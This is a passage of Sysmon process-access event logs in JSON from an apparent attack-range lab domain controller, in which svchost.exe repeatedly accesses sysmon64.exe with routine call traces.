C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.932","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5997,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.932\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.932","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5998,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.932\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.932","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5999,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.932\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.932","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6000,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.932\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.932","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6001,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.932\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.932","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6002,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.932\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.932","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6003,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.932\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.932","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6004,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.932\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 